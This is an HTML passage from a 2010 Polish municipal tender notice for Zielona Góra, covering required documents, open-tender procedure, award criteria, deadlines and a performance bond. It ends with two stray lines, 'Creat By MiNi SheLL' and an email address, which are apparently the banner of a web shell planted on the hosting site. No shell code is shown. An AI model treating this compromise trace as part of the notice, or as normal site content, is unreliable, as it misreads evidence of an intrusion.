<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Dokumenty i oświadczenia niezbędne do przeprowadzenia postępowania, wymagane                     od Wykonawcy ubiegającego się o zamówienie:
1)	wypełniony formularz oferty wg załącznika nr 1 do SIWZ;
2)	oświadczenie, że Wykonawca wykona zamówienie własnymi siłami lub określi część zamówienia, której wykonanie powierzy podwykonawcom wg załącznika nr 2 do SIWZ; 
3)dokumenty, o których mowa w pkt 3.4. SIWZ potwierdzające spełnienie warunków jakościowych nawierzchni (parametrów);
4)	dokładnie wypełniona Zbiorcza Tabela Elementów Rozliczeniowych na formularzu wg załącznika nr 9 do SIWZ;
5)	pełnomocnictwo lub inny dokument określający zakres umocowania do reprezentowania Wykonawcy, o ile ofertę składa pełnomocnik Wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z pkt 38 SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zielona-gora.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Zielona Góra, 65-424 Zielona Góra, ul. Podgórna 22, pok. 408.
Cena za SIWZ 309,52 zł - wraz z przesyłką 318,92 zł..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.07.2010 godzina 11:00, miejsce: Urząd Miasta Zielona Góra, 65-424 Zielona Góra, ul. Podgórna 22, pok. 408..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza, przed podpisaniem umowy zobowiązany jest do wniesienia zabezpieczenia należytego wykonania umowy w wysokości 5 % ceny całkowitej podanej   w ofercie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com